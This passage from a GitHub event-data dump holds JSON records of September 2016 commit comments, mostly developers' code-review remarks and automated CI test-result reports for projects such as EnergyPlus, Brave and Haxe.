href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-18ba828728c0fdea5ff74379f2ca91fef5172cb0-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-76.01%25-red.svg)</a> \n"}},"created_at":"2016-09-14T03:25:17Z"}
{"id":"4559627667","type":"CommitCommentEvent","actor":{"login":"consp1racy"},"repo":{"name":"consp1racy/android-support-preference"},"payload":{"comment":{"id":19012297,"position":null,"line":null,"path":null,"commit_id":"75dd33c59cd72c9674190d29789f715f7a42e9fe","created_at":"2016-09-14T03:25:20Z","updated_at":"2016-09-14T03:25:20Z","body":"I'm aware of this. That's because the support repository version 37 is missing suport library 24.2.0.\r\n\r\nYour options AFAIK:\r\n\r\n1) Wait for support repository version 38 which I'm sure will address this.\r\n2) Copy missing data from another device where you haven't updated to support repository 37 yet.\r\n3) Get missing data from my upload here https://uloz.to/!Ctqu8JfZa/sdk-extras-android-m2repository-24-2-0-zip. Exercise caution when downloading anything from unverified sources.\r\n\r\nI will not be releasing a new version of support-preference for this."}},"created_at":"2016-09-14T03:25:20Z"}
{"id":"4559628185","type":"CommitCommentEvent","actor":{"login":"loriab"},"repo":{"name":"jturney/psi4"},"payload":{"comment":{"id":19012299,"position":5,"line":64,"path":"tests/CMakeLists.txt","commit_id":"2150c7bb23b6f6777f53b2ae18c5532c97bd9cf5","created_at":"2016-09-14T03:25:31Z","updated_at":"2016-09-14T03:25:31Z","body":"You don't want to add directory `psi4numpy` here, as this list is for indiv. test cases. Instead, add a section like libefp at https://github.com/jturney/psi4/commit/2150c7bb23b6f6777f53b2ae18c5532c97bd9cf5#diff-3dea97423f83302e647a3bab62bf1157R134"}},"created_at":"2016-09-14T03:25:31Z"}
{"id":"4559630405","type":"CommitCommentEvent","actor":{"login":"RichardMarks"},"repo":{"name":"stephenc222/Punch-the-Monkey"},"payload":{"comment":{"id":19012304,"position":5,"line":10,"path":"index.html","commit_id":"5868161b2279b105f08e9c4fe576b4ac6ef2c339","created_at":"2016-09-14T03:26:25Z","updated_at":"2016-09-14T03:26:25Z","body":"you do not need the `type='text/javascript'` param in modern browsers"}},"created_at":"2016-09-14T03:26:25Z"}
{"id":"4559638204","type":"CommitCommentEvent","actor":{"login":"RichardMarks"},"repo":{"name":"stephenc222/Punch-the-Monkey"},"payload":{"comment":{"id":19012316,"position":5,"line":5,"path":"package.json","commit_id":"5868161b2279b105f08e9c4fe576b4ac6ef2c339","created_at":"2016-09-14T03:29:29Z","updated_at":"2016-09-14T03:29:29Z","body":"your main file is not correct. point to the primary js file of your project"}},"created_at":"2016-09-14T03:29:29Z"}
{"id":"4559640026","type":"CommitCommentEvent","actor":{"login":"RichardMarks"},"repo":{"name":"stephenc222/Punch-the-Monkey"},"payload":{"comment":{"id":19012320,"position":7,"line":7,"path":"package.json","commit_id":"5868161b2279b105f08e9c4fe576b4ac6ef2c339","created_at":"2016-09-14T03:30:14Z","updated_at":"2016-09-14T03:30:14Z","body":"add\r\n`\"start\": \"webpack --progress --colors --watch\"`"}},"created_at":"2016-09-14T03:30:14Z"}
{"id":"4559641765","type":"CommitCommentEvent","actor":{"login":"xiaoistone"},"repo":{"name":"xiaoistone/i-cloud"},"payload":{"comment":{"id":19012323,"position":null,"line":null,"path":null,"commit_id":"8caebc737f12eeafb1e63ecd9e7b4376f68c7548","created_at":"2016-09-14T03:30:50Z","updated_at":"2016-09-14T03:30:50Z","body":"#lfsong1688"}},"created_at":"2016-09-14T03:30:50Z"}
{"id":"4559642046","type":"CommitCommentEvent","actor":{"login":"DianeOfTheMoon"},"repo":{"name":"DianeOfTheMoon/Roth_UI"},"payload":{"comment":{"id":19012326,"position":null,"line":null,"path":null,"commit_id":"ba13423999854a473923b184c290f1d4a64bc558","created_at":"2016-09-14T03:30:57Z","updated_at":"2016-09-14T03:30:57Z","body":"I had moved it to tooltip since it was skinning both things the same way.  No reason other than that.\r\n\r\nBy the way, I ran into a snag with LSM media callbacks, so we shouldn't go with the solution above.  I've got something similar, but still need to put it up.\r\n\r\nAlso, I was thinking that instead of trying to do everything at once, maybe we should put in issues for each segment of the addon and then the reviews can be easier to digest and handle?  What do you think?"}},"created_at":"2016-09-14T03:30:57Z"}
{"id":"4559642682","type":"CommitCommentEvent","actor":{"login":"xiaoistone"},"repo":{"name":"xiaoistone/i-cloud"},"payload":{"comment":{"id":19012329,"position":null,"line":null,"path":null,"commit_id":"8caebc737f12eeafb1e63ecd9e7b4376f68c7548","created_at":"2016-09-14T03:31:13Z","updated_at":"2016-09-14T03:31:13Z","body":"learn create branch on github"}},"created_at":"2016-09-14T03:31:13Z"}
{"id":"4559642834","type":"CommitCommentEvent","actor":{"login":"ezn0012"},"repo":{"name":"ezn0012/hello-world"},"payload":{"comment":{"id":19012330,"position":null,"line":null,"path":null,"commit_id":"7b12ef7627595ff137e019308dbf06df9513c28d","created_at":"2016-09-14T03:31:16Z","updated_at":"2016-09-14T03:31:16Z","body":"saying hello hello"}},"created_at":"2016-09-14T03:31:16Z"}
{"id":"4559644134","type":"CommitCommentEvent","actor":{"login":"RichardMarks"},"repo":{"name":"stephenc222/Punch-the-Monkey"},"payload":{"comment":{"id":19012332,"position":null,"line":null,"path":null,"commit_id":"5868161b2279b105f08e9c4fe576b4ac6ef2c339","created_at":"2016-09-14T03:31:48Z","updated_at":"2016-09-14T03:31:48Z","body":"What was the reasoning for putting things into a directory named `resources`?"}},"created_at":"2016-09-14T03:31:48Z"}
{"id":"4559655002","type":"CommitCommentEvent","actor":{"login":"BrainerdofDenver"},"repo":{"name":"BrainerdofDenver/HW2"},"payload":{"comment":{"id":19012345,"position":null,"line":null,"path":null,"commit_id":"7650501bb2697f06c27021a48e26a9794c20e3f7","created_at":"2016-09-14T03:36:04Z","updated_at":"2016-09-14T03:36:04Z","body":"[HW2Second.txt](https://github.com/BrainerdofDenver/HW2/files/471228/HW2Second.txt)\r\n"}},"created_at":"2016-09-14T03:36:04Z"}
{"id":"4559657304","type":"CommitCommentEvent","actor":{"login":"lcl18337162716"},"repo":{"name":"lcl18337162716/giteg"},"payload":{"comment":{"id":19012350,"position":5,"line":23,"path":"addfile.txt","commit_id":"72921728dba93fd155d5b9ca202e1f125be23028","created_at":"2016-09-14T03:36:57Z","updated_at":"2016-09-14T03:36:57Z","body":"aa"}},"created_at":"2016-09-14T03:36:57Z"}
{"id":"4559658467","type":"CommitCommentEvent","actor":{"login":"xyyx"},"repo":{"name":"DirtyUnicorns/android_packages_apps_Settings"},"payload":{"comment":{"id":19012351,"position":null,"line":null,"path":null,"commit_id":"2cc5f0457adfb02100c3c030badb5b30eeaa2afa","created_at":"2016-09-14T03:37:24Z","updated_at":"2016-09-14T03:37:24Z","body":"Does it work? I have suggestions with this patch too("}},"created_at":"2016-09-14T03:37:24Z"}
{"id":"4559660858","type":"CommitCommentEvent","actor":{"login":"oldperson"},"repo":{"name":"EEIT87Team03/Aoide"},"payload":{"comment":{"id":19012357,"position":null,"line":null,"path":null,"commit_id":"c2e6fdb4c95f8cf4c5f5856f3b5857654d76afa4","created_at":"2016-09-14T03:38:14Z","updated_at":"2016-09-14T03:38:14Z","body":"水喔~\r\n"}},"created_at":"2016-09-14T03:38:14Z"}
{"id":"4559663689","type":"CommitCommentEvent","actor":{"login":"Mazda--"},"repo":{"name":"DirtyUnicorns/android_packages_apps_Settings"},"payload":{"comment":{"id":19012360,"position":null,"line":null,"path":null,"commit_id":"2cc5f0457adfb02100c3c030badb5b30eeaa2afa","created_at":"2016-09-14T03:39:20Z","updated_at":"2016-09-14T03:39:20Z","body":"Yes it works. Note that is on by default so you must flip the switch to make them go away. "}},"created_at":"2016-09-14T03:39:20Z"}
{"id":"4559663897","type":"CommitCommentEvent","actor":{"login":"diracdeltas"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19012361,"position":null,"line":null,"path":null,"commit_id":"06120eac6995497ac85d58307a67205b1b1d6b42","created_at":"2016-09-14T03:39:25Z","updated_at":"2016-09-14T03:39:25Z","body":"thanks"}},"created_at":"2016-09-14T03:39:25Z"}
{"id":"4559665497","type":"CommitCommentEvent","actor":{"login":"mrose17"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19012364,"position":null,"line":null,"path":null,"commit_id":"06120eac6995497ac85d58307a67205b1b1d6b42","created_at":"2016-09-14T03:39:59Z","updated_at":"2016-09-14T03:39:59Z","body":"i thought i had removed in earlier... oh well!"}},"created_at":"2016-09-14T03:39:59Z"}
{"id":"4559666319","type":"CommitCommentEvent","actor":{"login":"rmortan"},"repo":{"name":"rmortan/INTRO"},"payload":{"comment":{"id":19012367,"position":null,"line":null,"path":null,"commit_id":"2d505df74dfca03339d64e7e4981a4d1dffb8156","created_at":"2016-09-14T03:40:19Z","updated_at":"2016-09-14T03:40:19Z","body":"NESTED somewhat cleaner\r\nat least enough for a review"}},"created_at":"2016-09-14T03:40:19Z"}
{"id":"4559668135","type":"CommitCommentEvent","actor":{"login":"fengyueer007"},"repo":{"name":"fengyueer007/KnowladgeSummary"},"payload":{"comment":{"id":19012372,"position":null,"line":null,"path":null,"commit_id":"04461c109b64a10d12bd47661f93a8b061211aeb","created_at":"2016-09-14T03:41:04Z","updated_at":"2016-09-14T03:41:04Z","body":"ok"}},"created_at":"2016-09-14T03:41:04Z"}
{"id":"4559683543","type":"CommitCommentEvent","actor":{"login":"diracdeltas"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19012412,"position":null,"line":null,"path":null,"commit_id":"c7db96fae4c27b9cc2444926b94aac5c81dde2ed","created_at":"2016-09-14T03:47:06Z","updated_at":"2016-09-14T03:47:06Z","body":"nvm, these appear to be failing in Travis"}},"created_at":"2016-09-14T03:47:06Z"}
{"id":"4559689287","type":"CommitCommentEvent","actor":{"login":"aciidb0mb3r"},"repo":{"name":"aciidb0mb3r/swift-package-manager"},"payload":{"comment":{"id":19012423,"position":13,"line":208,"path":"Sources/SourceControl/GitRepository.swift","commit_id":"09911a649008defe2fd93426778865afa74fcc34","created_at":"2016-09-14T03:49:32Z","updated_at":"2016-09-14T03:49:32Z","body":"😺"}},"created_at":"2016-09-14T03:49:32Z"}
{"id":"4559689349","type":"CommitCommentEvent","actor":{"login":"diracdeltas"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19012424,"position":null,"line":null,"path":null,"commit_id":"c7db96fae4c27b9cc2444926b94aac5c81dde2ed","created_at":"2016-09-14T03:49:33Z","updated_at":"2016-09-14T03:49:33Z","body":"i forgot we don't support exact URL patterns in siteSettings, so i'm going to revert this"}},"created_at":"2016-09-14T03:49:33Z"}
{"id":"4559691657","type":"CommitCommentEvent","actor":{"login":"arhuaco"},"repo":{"name":"arhuaco/protocol-buffers"},"payload":{"comment":{"id":19012431,"position":null,"line":null,"path":null,"commit_id":"d1a8db5b50fc0918e9e87c0e45573ea4c49ab5e4","created_at":"2016-09-14T03:50:26Z","updated_at":"2016-09-14T03:50:26Z","body":"MALOS-eye will be configured (and reconfigured without restarting). This commit introduces the most basic configuration that has been hard-coded before."}},"created_at":"2016-09-14T03:50:26Z"}
{"id":"4559695240","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19012436,"position":null,"line":null,"path":null,"commit_id":"d1330a0bfe6e42c227c3115b40299a6035bf4190","created_at":"2016-09-14T03:51:52Z","updated_at":"2016-09-14T03:51:52Z","body":"versionNumbers (mitchute) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2347 of 2368 tests passed, 0 test warnings)\n\n * 20 tests had: EIO diffs.\n * 20 tests had: ERR diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d1330a0bfe6e42c227c3115b40299a6035bf4190-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d1330a0bfe6e42c227c3115b40299a6035bf4190-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.11%25-yellow.svg)</a> \n"}},"created_at":"2016-09-14T03:51:52Z"}
{"id":"4559695277","type":"CommitCommentEvent","actor":{"login":"xyyx"},"repo":{"name":"DirtyUnicorns/android_packages_apps_Settings"},"payload":{"comment":{"id":19012437,"position":null,"line":null,"path":null,"commit_id":"2cc5f0457adfb02100c3c030badb5b30eeaa2afa","created_at":"2016-09-14T03:51:53Z","updated_at":"2016-09-14T03:51:53Z","body":"Thanks. I am stupid idiot. I try it without switches from adb and wrote to another database)"}},"created_at":"2016-09-14T03:51:53Z"}
{"id":"4559697691","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19012441,"position":null,"line":null,"path":null,"commit_id":"d1330a0bfe6e42c227c3115b40299a6035bf4190","created_at":"2016-09-14T03:52:49Z","updated_at":"2016-09-14T03:52:49Z","body":"versionNumbers (mitchute) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d1330a0bfe6e42c227c3115b40299a6035bf4190-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-14T03:52:49Z"}
{"id":"4559697740","type":"CommitCommentEvent","actor":{"login":"ststar8623"},"repo":{"name":"ststar8623/framework.greetr"},"payload":{"comment":{"id":19012442,"position":2,"line":2,"path":"greetr.js","commit_id":"158296ade8ee2e695fdcd4cb1df687c85463f1d7","created_at":"2016-09-14T03:52:51Z","updated_at":"2016-09-14T03:52:51Z","body":"// 'new' an object"}},"created_at":"2016-09-14T03:52:51Z"}
{"id":"4559699147","type":"CommitCommentEvent","actor":{"login":"qingweibinary"},"repo":{"name":"binary-com/binary-charts"},"payload":{"comment":{"id":19012445,"position":7,"line":11,"path":"src/config/updateBarriers.js","commit_id":"450d89f20bac13545d4e1ace95673f35fb68b930","created_at":"2016-09-14T03:53:27Z","updated_at":"2016-09-14T03:53:27Z","body":"@borisyankov it does not mean the same thing"}},"created_at":"2016-09-14T03:53:27Z"}
{"id":"4559704835","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":19012454,"position":null,"line":null,"path":null,"commit_id":"30bf89f3d8e564b588b8e48993e92a551b384f2c","created_at":"2016-09-14T03:55:53Z","updated_at":"2016-09-14T03:55:53Z","body":"Executing the daily benchmark build, I will reply here when finished:\n\n@nanosoldier `runbenchmarks(ALL, isdaily = true)`\n"}},"created_at":"2016-09-14T03:55:53Z"}
{"id":"4559708053","type":"CommitCommentEvent","actor":{"login":"sypherce"},"repo":{"name":"sypherce/ds2key"},"payload":{"comment":{"id":19012461,"position":null,"line":null,"path":null,"commit_id":"0aa425954f896a0068e9aff4afdf6d404aa1d4af","created_at":"2016-09-14T03:57:14Z","updated_at":"2016-09-14T03:57:14Z","body":"This messed up. Proper commit is: a552a31ad423e342fabdc9d4bc371faa449df095"}},"created_at":"2016-09-14T03:57:14Z"}
{"id":"4559717179","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19012473,"position":null,"line":null,"path":null,"commit_id":"69c685c242f9be19d8e1f66481a2c106ab588ea6","created_at":"2016-09-14T04:00:50Z","updated_at":"2016-09-14T04:00:50Z","body":"113835705-Low-Temp-Radiant-Variable-Flow-Autosize-Issue (RKStrand) - Win64-Windows-7-VisualStudio-12: OK (2332 of 2335 tests passed, 0 test warnings)\n\n * 3 tests had: AUD diffs.\n * 3 tests had: EIO diffs.\n * 3 tests had: ERR diffs.\n * 3 tests had: ESO big diffs.\n * 3 tests had: MTR big diffs.\n * 3 tests had: ZSZ big diffs.\n * 3 tests had: Table big diffs.\n * 1 test had: MTD diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-69c685c242f9be19d8e1f66481a2c106ab588ea6-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-69c685c242f9be19d8e1f66481a2c106ab588ea6-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.87%25-yellow.svg)</a> \n"}},"created_at":"2016-09-14T04:00:50Z"}
{"id":"4559723649","type":"CommitCommentEvent","actor":{"login":"bridiver"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19012485,"position":null,"line":null,"path":null,"commit_id":"3ff17ae253093af57f7d6282993eedf0cdf43789","created_at":"2016-09-14T04:03:33Z","updated_at":"2016-09-14T04:03:33Z","body":"I think this is causing problems for `onepassword4-extension://activate/Chrome`. If onepassword mini is closed, https://agilebits.com/browsers/welcome.html opens up and reloads endlessly"}},"created_at":"2016-09-14T04:03:33Z"}
{"id":"4559725222","type":"CommitCommentEvent","actor":{"login":"237444405"},"repo":{"name":"237444405/xiedong"},"payload":{"comment":{"id":19012489,"position":null,"line":null,"path":null,"commit_id":"168bdf577963aae8458d8c550d1d841520ad2eb4","created_at":"2016-09-14T04:04:11Z","updated_at":"2016-09-14T04:04:11Z","body":"Base64Coder.encodeString(\"\")：\r\naHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tLzIzNzQ0NDQwNS94aWVkb25nL3NlcnZpY2UvZ2FtZS9oencuanNvbg==\r\nBase64Coder.decodeString(\"\")：\r\nhttps://raw.githubusercontent.com/237444405/xiedong/service/game/hzw.json\r\n\r\n海贼王服务更新时间是2016年9月14日。距离服务器到期时间还有3天。抓紧了 谢董 加油！"}},"created_at":"2016-09-14T04:04:11Z"}
{"id":"4559726781","type":"CommitCommentEvent","actor":{"login":"bridiver"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19012496,"position":16,"line":858,"path":"js/components/frame.js","commit_id":"3ff17ae253093af57f7d6282993eedf0cdf43789","created_at":"2016-09-14T04:04:52Z","updated_at":"2016-09-14T04:04:52Z","body":"I think the issue is that setting the url is reloading the previous page and I think we just want to change the location. The issue might also be related to regular load failures vs provision load failures"}},"created_at":"2016-09-14T04:04:52Z"}
{"id":"4559735081","type":"CommitCommentEvent","actor":{"login":"TomasMikula"},"repo":{"name":"typelevel/algebra"},"payload":{"comment":{"id":19012512,"position":135,"line":208,"path":"README.md","commit_id":"fbffcd6c6e56f553c7e1f3a26bc05ea87d16a358","created_at":"2016-09-14T04:08:24Z","updated_at":"2016-09-14T04:08:24Z","body":"The line break here broke the rendering. It now looks like this: `a + (b\r\n* c) = (a + b) * (a + c)`."}},"created_at":"2016-09-14T04:08:24Z"}
{"id":"4559738656","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19012516,"position":null,"line":null,"path":null,"commit_id":"79fa859bb0621903ea4191dc40bf75ae1c63a579","created_at":"2016-09-14T04:10:03Z","updated_at":"2016-09-14T04:10:03Z","body":"develop (mjwitte) - i386-Windows-7-VisualStudio-12: OK (1763 of 1763 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-79fa859bb0621903ea4191dc40bf75ae1c63a579-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-79fa859bb0621903ea4191dc40bf75ae1c63a579-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-14T04:10:03Z"}
{"id":"4559745120","type":"CommitCommentEvent","actor":{"login":"non"},"repo":{"name":"typelevel/algebra"},"payload":{"comment":{"id":19012524,"position":135,"line":208,"path":"README.md","commit_id":"fbffcd6c6e56f553c7e1f3a26bc05ea87d16a358","created_at":"2016-09-14T04:12:36Z","updated_at":"2016-09-14T04:12:36Z","body":"Good catch! I'll submit a fix."}},"created_at":"2016-09-14T04:12:36Z"}
{"id":"4559748041","type":"CommitCommentEvent","actor":{"login":"R32"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":19012527,"position":null,"line":null,"path":null,"commit_id":"5b8bc7dd3dfb8999df8d86ccfdb9273dcc933d36","created_at":"2016-09-14T04:13:54Z","updated_at":"2016-09-14T04:13:54Z","body":"Finally, I used a macro to temporarily solve the problem, It looks pretty good for me\r\n\r\n```haxe\r\nclass Memory {\r\n    macro public static function setByte(i, v) return macro untyped __vmem_set__(0, $i, $v);\r\n    macro public static function getByte(i) return macro untyped __vmem_get__(0, $i);\r\n}\r\nclass Test {\r\n\tstatic function main() {\r\n        var byte = haxe.io.Bytes.alloc(1024);\r\n        var p = byte.get(0);\r\n        Memory.setByte(p, Memory.getByte(p));\r\n        Memory.setByte(p + 1, Memory.getByte(p + 101));\r\n        Memory.setByte(p + 2, Memory.getByte(p + 102));\r\n        Memory.setByte(p + 3, Memory.getByte(p + 103));\r\n\t}\r\n}\r\n```\r\nTest.dump\r\n```js\r\nstatic function main() {\r\n\tvar byte = haxe.io.Bytes.alloc(1024);\r\n\tvar p = byte.b[0];\r\n\t__vmem_set__(0, p, __vmem_get__(0, p));\r\n\t__vmem_set__(0, p + 1, __vmem_get__(0, p + 101));\r\n\t__vmem_set__(0, p + 2, __vmem_get__(0, p + 102));\r\n\t__vmem_set__(0, p + 3, __vmem_get__(0, p + 103));\r\n}\r\n```"}},"created_at":"2016-09-14T04:13:54Z"}
{"id":"4559748655","type":"CommitCommentEvent","actor":{"login":"AndrioCelos"},"repo":{"name":"Iyouboushi/mIRC-BattleArena"},"payload":{"comment":{"id":19012528,"position":17,"line":165,"path":"battlearena/characters.als","commit_id":"e442a00419cf24f7296f519e4288ba8074d6de56","created_at":"2016-09-14T04:14:11Z","updated_at":"2016-09-14T04:14:11Z","body":"Correct is `18 * %next.level - 9` because of the rounding."}},"created_at":"2016-09-14T04:14:11Z"}
{"id":"4559755680","type":"CommitCommentEvent","actor":{"login":"iamgoangle"},"repo":{"name":"pongsakornsemsuwan/brownbox"},"payload":{"comment":{"id":19012537,"position":11,"line":58,"path":"app/containers/ItemDetailContainer.js","commit_id":"1d78fd7cb150568d54a422801629dee4f1e58ef9","created_at":"2016-09-14T04:16:53Z","updated_at":"2016-09-14T04:16:53Z","body":"ถ้าเราใช้ mapDispatchToProps() mapping Redux action creator to component props แล้วเปลี่ยนเป็น this.props.selectSize(value) ความหมายน่าจะเหมือนกันไหม\r\n\r\nhttps://github.com/reactjs/react-redux/blob/master/docs/api.md#connectmapstatetoprops-mapdispatchtoprops-mergeprops-options"}},"created_at":"2016-09-14T04:16:53Z"}
{"id":"4559755752","type":"CommitCommentEvent","actor":{"login":"zhaoweicai"},"repo":{"name":"zhaoweicai/mscnn"},"payload":{"comment":{"id":19012539,"position":null,"line":null,"path":null,"commit_id":"f97b60faa8ace91ce0d9e2d2748fe6669776c4f5","created_at":"2016-09-14T04:16:55Z","updated_at":"2016-09-14T04:16:55Z","body":"Add Caltech experiments"}},"created_at":"2016-09-14T04:16:55Z"}
{"id":"4559756786","type":"CommitCommentEvent","actor":{"login":"superjeffreyc"},"repo":{"name":"BinghamtonTableTennis/rating-system"},"payload":{"comment":{"id":19012541,"position":null,"line":null,"path":null,"commit_id":"5a8edb0ebb118419bb4430c6b3cb5e91c496ec44","created_at":"2016-09-14T04:17:18Z","updated_at":"2016-09-14T04:17:18Z","body":"This is actually Richard Zhang's commit. We had issues with the Cloud9 settings."}},"created_at":"2016-09-14T04:17:18Z"}
{"id":"4559756895","type":"CommitCommentEvent","actor":{"login":"warmhug"},"repo":{"name":"ant-design/ant-design-mobile"},"payload":{"comment":{"id":19012543,"position":null,"line":null,"path":null,"commit_id":"8325f6444970559e465d71df625e81cbe57c0b85","created_at":"2016-09-14T04:17:20Z","updated_at":"2016-09-14T04:17:20Z","body":"package.json 里 rc-input-number 依赖版本号，也要改一下"}},"created_at":"2016-09-14T04:17:20Z"}
{"id":"4559759945","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19012546,"position":null,"line":null,"path":null,"commit_id":"7e58bf3c12c6c7dbd82f7d7ab0ad62f7c53b4ea3","created_at":"2016-09-14T04:18:31Z","updated_at":"2016-09-14T04:18:31Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/35327/testReport/) for this commit**"}},"created_at":"2016-09-14T04:18:31Z"}
{"id":"4559759946","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19012545,"position":null,"line":null,"path":null,"commit_id":"8f7b8c8fb1e9acf77b63803cebbaa2e65cc5af66","created_at":"2016-09-14T04:18:31Z","updated_at":"2016-09-14T04:18:31Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/35326/testReport/) for this commit**"}},"created_at":"2016-09-14T04:18:31Z"}
{"id":"4559760474","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19012547,"position":null,"line":null,"path":null,"commit_id":"79fa859bb0621903ea4191dc40bf75ae1c63a579","created_at":"2016-09-14T04:18:45Z","updated_at":"2016-09-14T04:18:45Z","body":"develop (mjwitte) - Win64-Windows-7-VisualStudio-12: OK (1763 of 1763 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-79fa859bb0621903ea4191dc40bf75ae1c63a579-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-79fa859bb0621903ea4191dc40bf75ae1c63a579-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-14T04:18:45Z"}
{"id":"4559761782","type":"CommitCommentEvent","actor":{"login":"warmhug"},"repo":{"name":"ant-design/ant-design-mobile"},"payload":{"comment":{"id":19012548,"position":null,"line":null,"path":null,"commit_id":"8325f6444970559e465d71df625e81cbe57c0b85","created_at":"2016-09-14T04:19:17Z","updated_at":"2016-09-14T04:19:17Z","body":"还有 md 文档里对 readOnly 的介绍，也要改"}},"created_at":"2016-09-14T04:19:17Z"}
{"id":"4559762359","type":"CommitCommentEvent","actor":{"login":"wdlkmpx"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":19012549,"position":null,"line":null,"path":null,"commit_id":"f8865dd2f27f0d50d8e6c30ccc16e0482768d417","created_at":"2016-09-14T04:19:33Z","updated_at":"2016-09-14T04:19:33Z","body":"so this is the swapfile stuff working fine. it loads only swap files located in HDDs... see line 30.. |ATA .. all the my HDDs have that string.. however i don't know what happens in SCSI drives, SSDs or any other appropriate devices..."}},"created_at":"2016-09-14T04:19:33Z"}
{"id":"4559763217","type":"CommitCommentEvent","actor":{"login":"mavrothal"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":19012551,"position":null,"line":null,"path":null,"commit_id":"5f84860065c26e07b98500ee0f60d2d2e5d8d755","created_at":"2016-09-14T04:19:56Z","updated_at":"2016-09-14T04:19:56Z","body":"That project (OLPC) is unfortunately dead. There is no point to get into the trouble."}},"created_at":"2016-09-14T04:19:56Z"}
{"id":"4559768187","type":"CommitCommentEvent","actor":{"login":"dheerajkrishna90"},"repo":{"name":"dheerajkrishna90/hello-world"},"payload":{"comment":{"id":19012565,"position":5,"line":4,"path":"README.md","commit_id":"b88c54b8396eaa0bfa1d2d65ee59bab5cd7ae7aa","created_at":"2016-09-14T04:22:06Z","updated_at":"2016-09-14T04:22:06Z","body":"I am interested in Machine Learning!!"}},"created_at":"2016-09-14T04:22:06Z"}
{"id":"4559768841","type":"CommitCommentEvent","actor":{"login":"unknownbrackets"},"repo":{"name":"hrydgard/ppsspp"},"payload":{"comment":{"id":19012567,"position":14,"line":330,"path":"Common/Arm64Emitter.cpp","commit_id":"2adec71f87f44b5c52d79b1debe74edd91bf8f06","created_at":"2016-09-14T04:22:22Z","updated_at":"2016-09-14T04:22:22Z","body":"Does anything use smaller than 64?  What if we always use 64 or less?\r\n\r\nI mean, this might have a penalty on systems with 128, but it's hopefully small, and it's the only completely safe way.  I guess it's hopefully unlikely, but an uncommon crash still isn't awesome...\r\n\r\n-[Unknown]"}},"created_at":"2016-09-14T04:22:22Z"}
